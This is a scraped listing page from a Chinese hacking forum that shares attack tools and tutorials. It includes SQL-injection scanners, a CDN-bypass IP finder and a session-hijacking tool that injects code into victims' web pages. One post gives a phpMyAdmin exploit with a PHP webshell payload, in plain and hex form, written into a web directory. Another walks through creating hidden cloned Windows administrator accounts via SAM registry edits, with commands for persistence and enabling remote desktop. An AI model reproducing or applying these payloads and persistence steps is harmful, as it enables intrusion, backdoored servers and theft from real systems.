动态 版块 发帖 消息 我的
Loading...
HadSky
支持原创软件,共创美好明天!
子版块
zkxr5317645
65
1.用户发帖分享资源即可获得10RMB,自动存入用户帐中,资源帖审核成功后,其他用户下载,即可获得,你所设置付费资源下载所得,活动期限由黑镰论坛官方定。2.限时特惠,永久VIP499/名,VIP用户论坛资源免费任性下,有兴趣可直接联系客服QQ3307108272。3.黑镰论坛目前我着手发布新资源,旧站资源,我们会审查之后,确认无后门再转过来,为了给用户熟悉的感觉,我们使用了旧模板,修复了一些bug,请用户在新站注册,在旧站账户中还有余额的,请及时联系我,我们将进行双倍补偿,,预计两个月后,论坛资源将陆续就位,论坛优化目前两天倒计时,信用保证我们不存在跑路,目前我们论坛可以直接开到2028年,并且此后论坛不存在改动,目前论坛所有资源一律进行审核,确保用户使用安全,若发现存在后门的资源,我们将去除后门然后分享,若无法去除,不予分享。
 0   0  33天前
zkxr5317645
63
黑镰论坛:经测试,此工具未发现后门链接下载:https://www.lanzous.com/i7s61uh 密码:隐藏内容
 0   3  13天前
zkxr5317645
30
w8Fuckcdn 绕过CDN获取真实IP现在站点使用CDN来提速是很常见的,w8Fuckcdn通过扫描全网绕过CDN获取网站真实IP地址。CDN , IP , masscanCDN特性支持winodws/linuxgevent 协程IO 最大化利用资源masscan扫描,最快能6分钟扫完全网支持HTTPS支持调节masscan的rate(速率)程序流程基于masscan扫描IP端中开放的80端口,程序自动连接每个IP测试,筛选出符合条件的ip保存到result.txt程序提供"基于扫描子域名获取IP段"的方法来尽可能减少IP段范围usage: python get_ips.py -d baidu.com当然,可以自己搜索相关域名,使用python get_ips.py -f target.txt --ips来生成IP段安装与使用依赖python 2.7pip install gevent dnspythonWindows需要安装WinPcap 1git clone https://github.com/boy-hack/w8fuckcdn使用target.log 配置扫描的IP段config.py 设置要查找的文本、网站域名以及配置是否进行HTTPS扫描支持运行 python fuckcdn.py
 0   0  13天前
zkxr5317645
31
黑镰论坛:经测试,此工具未发现后门链接    这是一款判断网站是否是sql注入点的批量sql注入检测工具,是渗透神器,我将之前的鹦鹉url采集器和它一起打包了。根据关键字 ?id=进行网站采集,一天十万条亲测可以批量检测出几百url这个样子,排除一些其他的其他的原因总之成功率挺大的,毕竟sql注入还是普遍存在的漏洞。鹦鹉博客出品的软件绝对不会包含任何后门,有兴趣的可以检测下,不喜勿下。演示https://www.lanzous.com/i7s5u5a密码:隐藏内容
 0   3  13天前
zkxr5317645
33
内容如下:0x01 Base1>website has phpmyadmin2>phpmyadmin can be logined by anyone without password3>the tbl_sql.php has been deleted by website manager or someone else0x02 AboutThe web server runs phpmyadmin,but with wrong setup,makes it possible for anyone to logined in phpmyadmin without password,and able to read the root password.There are two files: tbl_sql.php,sql.php. Generally,tbl_sql.php has execute sqlquery function like below picture at arrow 1,sql.php has view sql database function like below picture at arrow 2.generally,when we want to execute sql query likeselect '<? php @eval($_POST[cmd]);?>' into dumpfile '/var/www/1.php' or select 0x3c3f2070687020406576616c28245f504f53545b636d645d293b3f3e into dumpfile '/var/www/1.php' we will find this does not work here coz tbl_sql.php was deleted.It works out like below 404 error when I try to execute above query:0x03 Exploit> use sql.php to execute sqlquery> usage:https://xx.xx.xx/phpmyadmin/sql.php?xxx=xxx...&sql_query=[sqli] > [sqli] is sqlquery sentence been urlencoded.> eg.sql_query=select%20@@versiondetail:1>use burpsuite listening browser’s post|get request parameters when clicking any table name like below:2>add add get request parameter sql_query=select%20@@version3>find sqli has been execute
 0   0  13天前
zkxr5317645
30
简介本文将要介绍以下内容:· 帐户隐藏的方法· 编写脚本实现思路· 结合远程桌面多用户登录的利用思路帐户隐藏的方法该方法在网上已有相关资料,本节只做简单复现测试系统:·Win7 x861、对注册表赋予权限默认注册表HKEY_LOCAL_MACHINE\SAM\SAM\只有system权限才能修改现在需要为其添加管理员权限右键-权限-选中Administrators,允许完全控制如下图重新启动注册表regedit.exe,获得对该键值的修改权限2、新建特殊帐户net user test$ 123456 /add net localgroup administrators test$ /add注:用户名要以$结尾添加后,该帐户可在一定条件下隐藏,输入net user无法获取,如下图但是,在控制面板能够发现该帐户如下图3、导出注册表在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下找到新建的帐户test$获取默认类型为0x3ea将注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$导出为1.reg在注册表下能够找到对应类型名称的注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA如下图右键将该键导出为2.reg,保存的文件信息如下图默认情况下,管理员帐户Administrator对应的注册表键值为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4同样,右键将该键导出为3.reg将注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA下键F的值替换为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4下键F的值,即2.reg中键F的值替换成3.reg中键F的值替换后,如下图4、命令行删除特殊帐户net user test$ /del5、导入reg文件regedit /s 1.reg regedit /s 2.reg隐藏账户制做完成,控制面板不存在帐户test$通过net user无法列出该帐户计算机管理-本地用户和组-用户也无法列出该帐户但可通过如下方式查看:net user test$如下图无法通过net user test$ /del删除该用户,提示用户不属于此组,如下图删除方法:删除注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下对应帐户的键值(共有两处)注:工具HideAdmin能自动实现以上的创建和删除操作0x03 编写脚本实现思路采用powershell脚本实现的两种思路:1、对注册表添加管理员帐户的编辑权限使用regini注册ini文件为注册表及其子键赋予权限注:Powershell通过Set-Acl为注册表赋予权限,示例代码:$acl = Get-Acl HKLM:SAM\SAM\ $person = [System.Security.Principal.NTAccount]"Administrators" $access = [System.Security.AccessControl.RegistryRights]"FullControl" $inheritance = [System.Security.AccessControl.InheritanceFlags]"None" $propagation = [System.Security.AccessControl.PropagationFlags]"NoPropagateInherit" $type = [System.Security.AccessControl.AccessControlType]"Allow" $rule = New-Object System.Security.AccessControl.RegistryAccessRule( ` $person,$access,$inheritance,$propagation,$type) $acl.ResetAccessRule($rule) Set-Acl HKLM:SAM\SAM\Domains\Account\Users\Names $acl但不支持对子键的权限分配,因此不采用该方法以下内容保存为a.ini:HKEY_LOCAL_MACHINE\SAM\SAM\* [1 17]注:*代表枚举所有子键1代表Administrators 完全访问17代表System 完全访问详细权限说明可通过cmd执行regini获取帮助,如下图通过regini注册:regini  a.iniEvilcg就是通过这种方式实现的,脚本地址:https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1注:使用*需要system权限,但只把相关的列举出来,只需要管理员权限即可,例如:HKEY_LOCAL_MACHINESAM [1 17] HKEY_LOCAL_MACHINESAMSAM [1 17] HKEY_LOCAL_MACHINESAMSAMDomains [1 17] HKEY_LOCAL_MACHINESAMSAMDomainsAccount [1 17] HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [1 17] HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [1 17]2、直接获得System权限我在之前的文章《渗透技巧——Token窃取与利用》介绍过通过token复制获得system权限的方法所以,可以先获得System权限,进而拥有对注册表的编辑权限简单的方式,通过Invoke-TokenManipulation.ps1,地址如下:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1但我在测试时发现了一个bug,使用Invoke-TokenManipulation -ImpersonateUser -Username "nt authority\system"无法将当前权限切换为System权限但可以使用Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authoritysystem"新打开一个System权限的进程接下来,就是编写脚本实现注册表的导出替换功能:· 新建测试帐户· 将注册表导出到temp目录,进行替换· 删除特殊帐户· 导入注册表文件我的实现方法参照了Evilcg的最初始版本,做了细节上的优化,下载地址:https://github.com/3gstudent/Windows-User-Clone0x04 结合远程桌面多用户登录的利用思路通过以上的介绍,可得出该方法的优点:通过克隆的方式能够继承原帐户的权限在利用上存在以下需要注意的问题:1、复制管理员帐户Administrator需要注意管理员帐户是否被禁用,如果被禁用,那么克隆出的隐藏帐户也是被禁用状态2、复制已有帐户在3389远程登录的利用上存在相同帐户的冲突关系通过cmd开启本机的3389远程登录功能:REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f利用以上方法,克隆帐户a的权限,建立隐藏帐户aaa$如果系统当前登录帐号为a,那么使用隐藏帐户aaa$登录的话,会系统被识别为帐户a,导致帐户a下线3、新建帐户再复制进一步,大胆的思考新建管理员帐户b,克隆帐户b,建立隐藏账户bbb$删除管理员帐户b,隐藏账户bbb$仍然有效4、原帐户的维持再进一步克隆帐户a的权限,建立隐藏帐户aaa$修改帐户a的密码,隐藏帐户aaa$仍然有效0x05 防御针对隐藏帐户的利用,查看注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\即可当然,默认管理员权限无法查看,需要分配权限或是提升至Sytem权限隐藏帐户的登录记录,可通过查看日志获取0x06 小结本文介绍了隐藏帐户的相关利用技巧,如果应用于远程桌面的多用户登录,隐蔽性会大大提高,站在防御的角度,分享出该利用方法,帮助大家更好的认识和防御。
 0   0  13天前
zkxr5317645
36
黑镰论坛:经测试,此工具未发现后门链接下载:https://www.lanzous.com/i7s5hvi 密码:隐藏内容
 0   1  13天前
zkxr5317645
45
黑镰论坛:经测试,此工具未发现后门链接,虽然工具较老,但实用,适配性较差No Arp欺骗的会话劫持工具,支持上行,下行双向劫持。发布时间: 2008年9月12日更新:整合Httphijack 的功能并大大提高效率;增加上行劫持方式 即可用于服务器网络;更新引擎库使用说明:1.设置网卡,网关IP,本地IP2.下行劫持: 例如本机为192.168.3.3 目标为同一个子网的192.168.3.4 那么192.168.3.4 访问任何网页都会被插入代码3.上行劫持:本机为220.223.222.221 目标为同一个子网的220.223.222.225 那么任何访问220.223.222.225的客户端都会被插入代码4.代理: 用于CAM欺骗的数据包的目的MAC地址5.被动恢复CAM :等待交换机自行恢复CAM表(不建议使用)6.HTTP注入:开启代码注入功能7.右侧控制条为劫持包的发包频率8.底部状态栏分别为: 状态 代理IP/MAC 目标IP 发包频率 网卡负载注意:请自行安装winpcap和.net 2.0 解压后运行!!!不可将本软件用于非法用途!否则后果自负MaxHijack 1.4
 0   0  22天前
zkxr5317645
68
黑镰论坛:经测试,此工具未发现后门链接下载:https://www.lanzous.com/i7iiw2h 密码:隐藏内容
 0   3  22天前
zkxr5317645
80
超级SQL注入工具 介绍超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,工具采用C#开发,直接操作TCP会话来进行Socket发包与HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入。超级SQL注入工具支持注入类型HTTP协议任意位置的SQL注入HTTPS模式SQL注入Bool型盲注错误显示SQL注入Union SQL注入超级SQL注入工具支持注入数据库AccessMySQLSQLServerOraclePostgreSQLDB2SQLiteInformix等数据库支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。超级SQL注入工具 - SSQLInjection界面工具特点支持任意地点出现的任意SQL注入。支持全自动识别注入标记,也可人工识别注入并标记。支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。支持存在Token随机字符串的注入,支持二次注入。下表是各种数据库支持的获取数据的注入类型情况:数据库Bool盲注盲注(延时)显错注入Union注入基于版本Access✓××✓Access 2003MySQL✓✓✓✓MySQL 5.0SQLServer✓✓✓✓SQLServer 2003Oracle✓×✓✓Oracle 10gDB2✓××✓DB2 V8.1SQLite✓××✓SQLite 3PostgreSQL✓✓✓✓PostgreSQL 8.3Informix✓✓×✓Informix 11.5超级SQL注入工具 下载运行环境Net Framework 4.0Windows地址:https://github.com/shack2/SuperSQLInjectionV1/releases
 0   0  22天前
zkxr5317645
45
海量智能设备,尤其是使用高通芯片组的Android智能手机和平板电脑,或遭受一系列潜在漏洞的影响。根据网络安全公司CheckPoint发布的安全报告的内容,这些芯片漏洞可能会让攻击者窃取存储在安全区域的敏感数据,而这些安全区域本应该是智能设备中最安全的部分。这些漏洞存在于高通芯片的Secure Execution Environment(QSEE)中,这是一种基于ARM TrustZone技术的Trusted Execution Environment(TEE安全执行环境)的具体实现。QSEE也被称为高通芯片的Secure World,是主处理器上一个硬件隔离的安全区域,旨在保护敏感信息以及为执行可信应用提供一个独立的安全环境(REE)。除了个人信息,QSEE通常还有加密私钥、密码、身份凭证和银行卡信息等。因为该区域对权限控制极为严格,所以像驱动和普通应用这样的普通(Normal World)系统模块除非有必要,否则即使有root权限,也不能访问安全区域。CheckPoint的安全研究人员表示:“在为期4个月的研究中,我们成功逆向了高通芯片Secure World操作系统,并利用fuzz技术找到了漏洞。”“我们还特制了一个fuzzing工具,在三星、LG和摩托罗拉的设备上进行了测试,最终在三星设备中找到了四个漏洞,摩托罗拉设备找到了一个漏洞,LG设备上找到了一个漏洞。dxhdcp2 (LVE-SMP-190005)sec_store (SVE-2019-13952)authnr (SVE-2019-13949)esecomm (SVE-2019-13950)kmota (CVE-2019-10574)tzpr25 (Samsung已确认)prov (Motorola正在修复)根据研究人员的说法,高通芯片安全组件中的漏洞可让攻击者:在Android系统的Normal World下执行可信应用把修补后的可信应用加载到QSEE中绕过高通的信任链调整可信应用,使其运行在另一个制造商的设备上更多待开发的利用方式“一个有趣的事实是,我们也可以从另一个设备加载trustlet。只需将trustlet的.mdt文件中的哈希表、签名和证书链替换为来自设备制造商trustlet的哈希表、签名和证书链即可。”简而言之,TEE组件中的漏洞使设备易遭受各种安全威胁,包括敏感数据泄漏、设备被root、解锁引导加载程序以及执行无法检测到的APT。这些漏洞还影响到其他使用QSEE组件保护用户敏感信息的智能手机和物联网设备。CheckPoint已向所有受影响的厂商报告了漏洞,其中三星、高通和LG已经发布了针对这些QSEE漏洞的补丁。本文由黑镰论坛整理并翻译,不代表黑镰论坛任何观点和立场
 0   0  22天前
guest
登录之后更精彩~
您的IP:3.91.106.223,2019-12-15 13:24:19,Processed in 0.01454 second(s).
Powered by BlackSickle
本站资源仅供学习,拒绝违法使用,非法使用后果自负!